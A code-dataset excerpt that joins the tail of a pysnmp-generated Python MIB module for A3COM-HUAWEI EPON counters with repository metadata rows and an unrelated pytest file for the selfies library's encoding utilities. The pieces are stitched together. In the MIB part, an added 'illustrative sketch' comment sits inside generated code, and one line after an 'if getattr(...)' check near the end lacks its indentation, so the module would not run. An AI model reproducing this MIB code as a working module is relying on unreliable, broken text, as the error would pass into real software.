if mibBuilder.loadTexts: h3cDot3OmpEmulationOltPonCastLLID.setDescription('A count of frames received that contain a valid SLD field in an OLT, as defined in [802.3ah] 65.1.3.3.1, passes the CRC-8 check, as defined in [802.3ah] 65.1.3.3.3, and the frame meets the rule for acceptance defined in [802.3ah] 65.1.3.3.2.')
h3cDot3OmpEmulationBroadcastLLIDNotOnuID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 7), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDNotOnuID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDNotOnuID.setDescription('A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and contain broadcast LLID as defined in [802.3ah] clause 65. This attribute is mandatory for an OLT and for an ONU.')
h3cDot3OmpEmulationOnuLLIDNotBroadcast = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 8), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuLLIDNotBroadcast.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuLLIDNotBroadcast.setDescription("A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and contain the ONU's LLID as defined in [802.3ah] clause 65. This attribute is mandatory for an ONU and mandatory for an OLT (a counter per LLID).")
h3cDot3OmpEmulationBroadcastLLIDPlusOnuId = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 9), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDPlusOnuId.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDPlusOnuId.setDescription("A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and contain the broadcast LLID plus ONU's LLID (frame reflected) as defined in [802.3ah] clause 65. This attribute is mandatory for an ONU and mandatory for an OLT (a counter per LLID).")
h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 10), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId.setDescription("A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and does not contain the ONU's LLID as defined in [802.3ah] clause 65. This attribute is mandatory for an ONU")
h3cDot3OmpeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 1))
h3cDot3OmpeGroupID = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 1, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationType"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3OmpeGroupID = h3cDot3OmpeGroupID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpeGroupID.setDescription('A collection of objects of dot3 OMP emulation ID entity state definition.')
h3cDot3OmpeGroupStat = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 1, 2)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationSLDErrors"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationCRC8Errors"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationBadLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationGoodLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationOnuPonCastLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationOltPonCastLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationBroadcastLLIDNotOnuID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationOnuLLIDNotBroadcast"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationBroadcastLLIDPlusOnuId"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3OmpeGroupStat = h3cDot3OmpeGroupStat.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpeGroupStat.setDescription('A collection of objects of dot3 OMP emulation Statistics')
h3cDot3OmpeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 2))
h3cDot3OmpeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 2, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpeGroupID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpeGroupStat"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3OmpeCompliance = h3cDot3OmpeCompliance.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpeCompliance.setDescription('The compliance statement for OMPEmulation interfaces.')
h3cDot3EponMauMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3))
h3cDot3EponMauObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1))
h3cDot3EponMauConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2))
h3cDot3EponMauTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1), )
if mibBuilder.loadTexts: h3cDot3EponMauTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauTable.setDescription('Table for dot3 MAU EPON MIB modules.')
h3cDot3EponMauEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3EponMauEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauEntry.setDescription('An entry in the dot3 MAU EPON MIB modules table.')
h3cDot3EponMauPCSCodingViolation = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 1), Counter32()).setUnits('octets').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauPCSCodingViolation.setReference('[802.3ah], 30.5.1.1.12.')
if mibBuilder.loadTexts: h3cDot3EponMauPCSCodingViolation.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauPCSCodingViolation.setDescription('For 100 Mb/s operation it is a count of the number of times an invalid code-group is received, other than the /H/ code-group. For 1000 Mb/s operation it is a count of the number of times an invalid code-group is received, other than the /V/ code-group.')
h3cDot3EponMauFecAbility = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("nonsupported", 2), ("supported", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauFecAbility.setReference('[802.3ah], 30.5.1.1.13.')
if mibBuilder.loadTexts: h3cDot3EponMauFecAbility.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFecAbility.setDescription('A read-only value that indicates the support of operation of the 1000BASE-PX PHY optional FEC Sublayer for Forward error correction (see [802.3ah] clause 65.2). unknown(1) value is assigned in initializing, for non FEC support state or type not yet known. nonsupported(2) value is assigned when Sublayer is not supported. supported(3) value is assigned when Sublayer is supported.')
h3cDot3EponMauFecMode = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("disabled", 2), ("enabled", 3))).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cDot3EponMauFecMode.setReference('[802.3ah], 30.5.1.1.14.')
if mibBuilder.loadTexts: h3cDot3EponMauFecMode.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFecMode.setDescription('A read-write value that indicates the mode of operation of the 1000BASE-PX PHY optional FEC Sublayer for Forward error correction (see [802.3ah] clause 65.2). A GET operation returns the current mode of operation of the PHY. A SET operation changes the mode of operation of the PHY to the indicated value. unknown(1) value is assigned in initializing, for non FEC support state or type not yet known. disabled(2) value is assigned when Sublayer operating in disabled mode. enabled(3) value is assigned when Sublayer operating in FEC mode. Writing can be done all the time.')
h3cDot3EponMauFECCorrectedBlocks = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauFECCorrectedBlocks.setReference('[802.3ah], 30.5.1.1.15.')
if mibBuilder.loadTexts: h3cDot3EponMauFECCorrectedBlocks.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFECCorrectedBlocks.setDescription('For 10PASS-TS, 2BASE-TL and 1000BASE-PX PHYs, a count of corrected FEC blocks. This counter will not increment for other PHY Types. Increment the counter by one for each received block that is corrected by the FEC function in the PHY.')
h3cDot3EponMauFECUncorrectableBlocks = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauFECUncorrectableBlocks.setReference('[802.3ah], 30.5.1.1.16.')
if mibBuilder.loadTexts: h3cDot3EponMauFECUncorrectableBlocks.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFECUncorrectableBlocks.setDescription('For 10PASS-TS, 2BASE-TL and 1000BASE-PX PHYs, a count of uncorrectable FEC blocks. This counter will not increment for other PHY Types. Increment the counter by one for each FEC block that is determined to be uncorrectable by the FEC function in the PHY.')
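# Illustrative sketch (an assumption, not part of the generated MIB): rates are
# usually derived from two successive samples of Counter32 objects such as the
# FEC block counters above; Counter32 values wrap at 2**32, so deltas are taken
# modulo 2**32.
def _counter32_delta(previous, current):
    return (current - previous) % (1 << 32)
# e.g. _counter32_delta(4294967290, 5) == 11 across a wrap, and an
# uncorrectable-block ratio over an interval is
# uncorrectable_delta / float(corrected_delta + uncorrectable_delta).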
h3cDot3EponMauBufferHeadCodingViolation = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 6), Counter32()).setUnits('octets').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauBufferHeadCodingViolation.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauBufferHeadCodingViolation.setDescription('For 1000 Mb/s operation it is a count of the number of invalid code-groups received directly from the link.')
h3cDot3EponMauType = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3))
h3cEponMauType1000BasePXOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 1))
if mibBuilder.loadTexts: h3cEponMauType1000BasePXOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXOLT.setDescription('Multipoint MAC Control (per 802.3 section 64,65) OLT (master), unknown PMD')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePXONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 2))
if mibBuilder.loadTexts: h3cEponMauType1000BasePXONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXONU.setDescription('Multipoint MAC Control (per 802.3 section 64,65),ONU (slave), unknown PMD')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10DOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 3))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DOLT.setDescription('EPON over 10K link, downlink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10DONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 4))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DONU.setDescription('EPON over 10K link, downlink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10UOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 5))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UOLT.setDescription('EPON over 10K link, uplink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10UONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 6))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UONU.setDescription('EPON over 10K link, uplink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20DOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 7))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DOLT.setDescription('EPON over 20K link, downlink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20DONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 8))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DONU.setDescription('EPON over 20K link, downlink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20UOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 9))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UOLT.setDescription('EPON over 20K link, uplink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20UONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 10))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UONU.setDescription('EPON over 20K link, uplink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cDot3EponMauGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 1))
h3cDot3EponMauGroupAll = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 1, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauPCSCodingViolation"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3EponMauGroupAll = h3cDot3EponMauGroupAll.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauGroupAll.setDescription('A collection of objects of dot3 MAU definition.')
h3cDot3EponMauGroupFEC = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 1, 2)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFecAbility"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFecMode"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFECCorrectedBlocks"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFECUncorrectableBlocks"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauBufferHeadCodingViolation"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3EponMauGroupFEC = h3cDot3EponMauGroupFEC.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauGroupFEC.setDescription('A collection of objects of FEC group definition.')
h3cDot3EponMauCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 2))
h3cDot3EponMauCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 2, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauGroupAll"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauGroupFEC"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3EponMauCompliance = h3cDot3EponMauCompliance.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauCompliance.setDescription('The compliance statement for MAU EPON interfaces.')
mibBuilder.exportSymbols("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", h3cDot3MpcpStatEntry=h3cDot3MpcpStatEntry, h3cDot3OmpEmulationSLDErrors=h3cDot3OmpEmulationSLDErrors, h3cDot3OmpEmulationStatTable=h3cDot3OmpEmulationStatTable, h3cDot3MpcpRemoteMACAddress=h3cDot3MpcpRemoteMACAddress, h3cEponMauType1000BasePXONU=h3cEponMauType1000BasePXONU, h3cDot3EponMauMIB=h3cDot3EponMauMIB, h3cDot3OmpEmulationOnuLLIDNotBroadcast=h3cDot3OmpEmulationOnuLLIDNotBroadcast, h3cDot3OmpEmulationTable=h3cDot3OmpEmulationTable, h3cDot3MpcpGroupStat=h3cDot3MpcpGroupStat, h3cDot3OmpeGroupID=h3cDot3OmpeGroupID, h3cDot3MpcpDiscoveryWindowsSent=h3cDot3MpcpDiscoveryWindowsSent, h3cDot3MpcpCompliance=h3cDot3MpcpCompliance, h3cDot3OmpEmulationID=h3cDot3OmpEmulationID, h3cEponMauType1000BasePX10UONU=h3cEponMauType1000BasePX10UONU, h3cDot3MpcpRxRegAck=h3cDot3MpcpRxRegAck, h3cDot3OmpEmulationObjects=h3cDot3OmpEmulationObjects, h3cDot3MpcpCompliances=h3cDot3MpcpCompliances, h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId=h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId, h3cDot3EponMauConformance=h3cDot3EponMauConformance, h3cDot3MpcpMACCtrlFramesTransmitted=h3cDot3MpcpMACCtrlFramesTransmitted, h3cDot3MpcpRxRegister=h3cDot3MpcpRxRegister, h3cDot3MpcpDiscoveryTimeout=h3cDot3MpcpDiscoveryTimeout, h3cDot3EponMauGroups=h3cDot3EponMauGroups, h3cDot3MpcpRxRegRequest=h3cDot3MpcpRxRegRequest, h3cDot3MpcpGroupParam=h3cDot3MpcpGroupParam, h3cDot3EponMauPCSCodingViolation=h3cDot3EponMauPCSCodingViolation, h3cDot3MpcpStatTable=h3cDot3MpcpStatTable, h3cEponMauType1000BasePX10DOLT=h3cEponMauType1000BasePX10DOLT, h3cDot3OmpEmulationType=h3cDot3OmpEmulationType, h3cDot3MpcpID=h3cDot3MpcpID, h3cDot3MpcpTxRegister=h3cDot3MpcpTxRegister, h3cDot3EponMauFECCorrectedBlocks=h3cDot3EponMauFECCorrectedBlocks, h3cDot3OmpEmulationBroadcastLLIDPlusOnuId=h3cDot3OmpEmulationBroadcastLLIDPlusOnuId, h3cDot3MpcpTxReport=h3cDot3MpcpTxReport, h3cDot3OmpeGroups=h3cDot3OmpeGroups, h3cDot3MpcpOnTime=h3cDot3MpcpOnTime, h3cDot3EponMauFecMode=h3cDot3EponMauFecMode, h3cDot3OmpEmulationOnuPonCastLLID=h3cDot3OmpEmulationOnuPonCastLLID, h3cDot3MpcpTable=h3cDot3MpcpTable, h3cDot3MpcpRxGate=h3cDot3MpcpRxGate, h3cDot3MpcpTxGate=h3cDot3MpcpTxGate, h3cDot3OmpEmulationCRC8Errors=h3cDot3OmpEmulationCRC8Errors, h3cDot3EponMauGroupFEC=h3cDot3EponMauGroupFEC, h3cDot3MpcpReceiveElapsed=h3cDot3MpcpReceiveElapsed, h3cDot3MpcpTxRegRequest=h3cDot3MpcpTxRegRequest, h3cEponMauType1000BasePX20UOLT=h3cEponMauType1000BasePX20UOLT, h3cEponMauType1000BasePX20UONU=h3cEponMauType1000BasePX20UONU, h3cDot3MpcpConformance=h3cDot3MpcpConformance, h3cDot3EponMauFECUncorrectableBlocks=h3cDot3EponMauFECUncorrectableBlocks, h3cDot3OmpEmulationBroadcastLLIDNotOnuID=h3cDot3OmpEmulationBroadcastLLIDNotOnuID, h3cDot3MpcpMACCtrlFramesReceived=h3cDot3MpcpMACCtrlFramesReceived, h3cDot3OmpeConformance=h3cDot3OmpeConformance, h3cDot3MpcpMIB=h3cDot3MpcpMIB, h3cDot3OmpEmulationGoodLLID=h3cDot3OmpEmulationGoodLLID, h3cDot3MpcpAdminState=h3cDot3MpcpAdminState, h3cDot3EponMauCompliances=h3cDot3EponMauCompliances, h3cDot3OmpeCompliances=h3cDot3OmpeCompliances, h3cEponMauType1000BasePX10DONU=h3cEponMauType1000BasePX10DONU, h3cDot3MpcpEntry=h3cDot3MpcpEntry, h3cEponMauType1000BasePXOLT=h3cEponMauType1000BasePXOLT, h3cEponMauType1000BasePX10UOLT=h3cEponMauType1000BasePX10UOLT, h3cDot3EponMauCompliance=h3cDot3EponMauCompliance, h3cDot3EponMauTable=h3cDot3EponMauTable, h3cDot3OmpEmulationBadLLID=h3cDot3OmpEmulationBadLLID, h3cDot3EponMauBufferHeadCodingViolation=h3cDot3EponMauBufferHeadCodingViolation, 
h3cDot3MpcpSyncTime=h3cDot3MpcpSyncTime, h3cDot3OmpeGroupStat=h3cDot3OmpeGroupStat, h3cDot3OmpEmulationEntry=h3cDot3OmpEmulationEntry, h3cDot3OmpEmulationOltPonCastLLID=h3cDot3OmpEmulationOltPonCastLLID, h3cDot3EponMauObjects=h3cDot3EponMauObjects, h3cDot3MpcpOperStatus=h3cDot3MpcpOperStatus, h3cDot3EfmeponMIB=h3cDot3EfmeponMIB, h3cDot3OmpEmulationMIB=h3cDot3OmpEmulationMIB, h3cDot3EponMauFecAbility=h3cDot3EponMauFecAbility, h3cDot3EponMauType=h3cDot3EponMauType, h3cDot3MpcpObjects=h3cDot3MpcpObjects, h3cDot3EponMauEntry=h3cDot3EponMauEntry, h3cDot3MpcpGroupBase=h3cDot3MpcpGroupBase, h3cDot3MpcpRxNotSupportedMPCP=h3cDot3MpcpRxNotSupportedMPCP, h3cDot3MpcpLinkID=h3cDot3MpcpLinkID, h3cDot3MpcpRoundTripTime=h3cDot3MpcpRoundTripTime, h3cDot3MpcpOffTime=h3cDot3MpcpOffTime, h3cDot3OmpEmulationStatEntry=h3cDot3OmpEmulationStatEntry, h3cEponMauType1000BasePX20DOLT=h3cEponMauType1000BasePX20DOLT, h3cDot3MpcpMaximumPendingGrants=h3cDot3MpcpMaximumPendingGrants, h3cDot3EponMauGroupAll=h3cDot3EponMauGroupAll, h3cDot3OmpeCompliance=h3cDot3OmpeCompliance, h3cDot3MpcpMode=h3cDot3MpcpMode, h3cDot3MpcpRxReport=h3cDot3MpcpRxReport, h3cEponMauType1000BasePX20DONU=h3cEponMauType1000BasePX20DONU, PYSNMP_MODULE_ID=h3cDot3EfmeponMIB, h3cDot3MpcpRegistrationState=h3cDot3MpcpRegistrationState, h3cDot3MpcpTxRegAck=h3cDot3MpcpTxRegAck, h3cDot3MpcpTransmitElapsed=h3cDot3MpcpTransmitElapsed, h3cDot3MpcpGroups=h3cDot3MpcpGroups)
| 172.724036
| 4,940
| 0.775512
|
66665090a40521285c420044f6b7070e62249b7b
| 3,706
|
py
|
Python
|
tests/test_selfies_utils.py
|
ur-whitelab/selfies
|
6ee9529493da303f55f91994ca0c28fb04aa7606
|
[
"Apache-2.0"
] | 367
|
2019-06-03T13:07:17.000Z
|
2022-03-29T23:28:14.000Z
|
tests/test_selfies_utils.py
|
ur-whitelab/selfies
|
6ee9529493da303f55f91994ca0c28fb04aa7606
|
[
"Apache-2.0"
] | 56
|
2019-07-03T15:01:18.000Z
|
2022-02-24T19:10:49.000Z
|
tests/test_selfies_utils.py
|
ur-whitelab/selfies
|
6ee9529493da303f55f91994ca0c28fb04aa7606
|
[
"Apache-2.0"
] | 108
|
2019-06-02T01:36:31.000Z
|
2022-03-20T08:15:20.000Z
|
import pytest
import selfies as sf
class Entry:
def __init__(self, selfies, symbols, label, one_hot):
self.selfies = selfies
self.symbols = symbols
self.label = label
self.one_hot = one_hot
@pytest.fixture()
def dataset():
stoi = {"[nop]": 0, "[O]": 1, ".": 2, "[C]": 3, "[F]": 4}
itos = {i: c for c, i in stoi.items()}
pad_to_len = 4
entries = [
Entry(selfies="",
symbols=[],
label=[0, 0, 0, 0],
one_hot=[[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0]]),
Entry(selfies="[C][C][C]",
symbols=["[C]", "[C]", "[C]"],
label=[3, 3, 3, 0],
one_hot=[[0, 0, 0, 1, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 1, 0],
[1, 0, 0, 0, 0]]),
Entry(selfies="[C].[C]",
symbols=["[C]", ".", "[C]"],
label=[3, 2, 3, 0],
one_hot=[[0, 0, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[1, 0, 0, 0, 0]]),
Entry(selfies="[C][O][C][F]",
symbols=["[C]", "[O]", "[C]", "[F]"],
label=[3, 1, 3, 4],
one_hot=[[0, 0, 0, 1, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]]),
Entry(selfies="[C][O][C]",
symbols=["[C]", "[O]", "[C]"],
label=[3, 1, 3, 0],
one_hot=[[0, 0, 0, 1, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 1, 0],
[1, 0, 0, 0, 0]])
]
return entries, (stoi, itos, pad_to_len)
@pytest.fixture()
def dataset_flat_hots(dataset):
flat_hots = []
for entry in dataset[0]:
hot = [elm for vec in entry.one_hot for elm in vec]
flat_hots.append(hot)
return flat_hots
def test_len_selfies(dataset):
for entry in dataset[0]:
assert sf.len_selfies(entry.selfies) == len(entry.symbols)
def test_split_selfies(dataset):
for entry in dataset[0]:
assert list(sf.split_selfies(entry.selfies)) == entry.symbols
def test_get_alphabet_from_selfies(dataset):
entries, (vocab_stoi, _, _) = dataset
selfies = [entry.selfies for entry in entries]
alphabet = sf.get_alphabet_from_selfies(selfies)
alphabet.add("[nop]")
alphabet.add(".")
assert alphabet == set(vocab_stoi.keys())
def test_selfies_to_encoding(dataset):
entries, (vocab_stoi, vocab_itos, pad_to_len) = dataset
for entry in entries:
label, one_hot = sf.selfies_to_encoding(
entry.selfies, vocab_stoi, pad_to_len, "both"
)
assert label == entry.label
assert one_hot == entry.one_hot
# recover original selfies
selfies = sf.encoding_to_selfies(label, vocab_itos, "label")
selfies = selfies.replace("[nop]", "")
assert selfies == entry.selfies
selfies = sf.encoding_to_selfies(one_hot, vocab_itos, "one_hot")
selfies = selfies.replace("[nop]", "")
assert selfies == entry.selfies
